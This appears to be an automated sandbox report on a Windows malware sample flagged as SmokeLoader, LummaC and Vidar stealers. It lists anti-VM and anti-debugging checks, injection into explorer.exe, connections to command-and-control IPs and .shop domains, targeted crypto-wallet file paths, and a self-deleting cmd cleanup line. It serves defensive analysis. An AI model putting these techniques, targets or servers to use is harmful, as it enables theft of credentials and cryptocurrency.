Source: 5876.exe, 00000007.00000003.1761083758.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: IEBAAF.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: explorer.exe, 00000002.00000000.1403647144.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: IEBAAF.12.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: IEBAAF.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: IEBAAF.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000949000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: IEBAAF.12.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: IEBAAF.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW?n
Source: katDDA4.tmp, 0000000C.00000002.2540474103.00000000076B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: IEBAAF.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: IEBAAF.12.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: IEBAAF.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: IEBAAF.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: IEBAAF.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: explorer.exe, 00000002.00000000.1403647144.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: IEBAAF.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: IEBAAF.12.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: IEBAAF.12.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00=
Source: IEBAAF.12.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: IEBAAF.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: IEBAAF.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: IEBAAF.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: IEBAAF.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: IEBAAF.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: IEBAAF.12.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: katDDA4.tmp, 0000000C.00000002.2540474103.00000000076B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareoItL
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	System information queried: CodeIntegrityInformation			Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_007A2D2F rdtsc

7_2_007A2D2F

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

Code function: 0_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,

0_2_00403406

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D19AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_6D19AC62

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_0211092B mov eax, dword ptr fs:[00000030h]	0_2_0211092B
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02110D90 mov eax, dword ptr fs:[00000030h]	0_2_02110D90
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02155A27 push dword ptr fs:[00000030h]	0_2_02155A27
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_020C092B mov eax, dword ptr fs:[00000030h]	6_2_020C092B
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_020C0D90 mov eax, dword ptr fs:[00000030h]	6_2_020C0D90
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02205FC7 push dword ptr fs:[00000030h]	6_2_02205FC7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0079DAB3 push dword ptr fs:[00000030h]	7_2_0079DAB3
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0212092B mov eax, dword ptr fs:[00000030h]	7_2_0212092B
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02120D90 mov eax, dword ptr fs:[00000030h]	7_2_02120D90

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

0_2_0040BD58

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D19AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_6D19AC62

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: EE6.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.175.29.39 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.13.174.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.147.128.172 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80	Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\EE6.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\EE6.exe

11_2_0427A4F0

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Thread created: C:\Windows\explorer.exe EIP: 89B19E0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Thread created: unknown EIP: 8BD19E0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\EE6.exe

Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: 5876.exe	String found in binary or memory: zippyfinickysofwps.shop
Source: 5876.exe	String found in binary or memory: obsceneclassyjuwks.shop
Source: 5876.exe	String found in binary or memory: acceptabledcooeprs.shop
Source: 5876.exe	String found in binary or memory: whispedwoodmoodsksl.shop
Source: 5876.exe	String found in binary or memory: boredimperissvieos.shop
Source: 5876.exe	String found in binary or memory: holicisticscrarws.shop
Source: 5876.exe	String found in binary or memory: sweetsquarediaslw.shop
Source: 5876.exe	String found in binary or memory: plaintediousidowsko.shop
Source: 5876.exe	String found in binary or memory: miniaturefinerninewjs.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\EE6.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 42E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 641000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Process created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

12_2_6D1E4760

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

12_2_6D0C1C30

Source: explorer.exe, 00000002.00000000.1401510441.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.1403647144.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd]1Q

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D19AE71 cpuid

12_2_6D19AE71

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: GetLocaleInfoA,		0_2_0040B534
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: GetLocaleInfoA,		6_2_0040B534

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D19A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_6D19A8DC

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D0E8390 NSS_GetVersion,

12_2_6D0E8390

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\5876.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected CryptOne packer

Source: Yara match

File source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
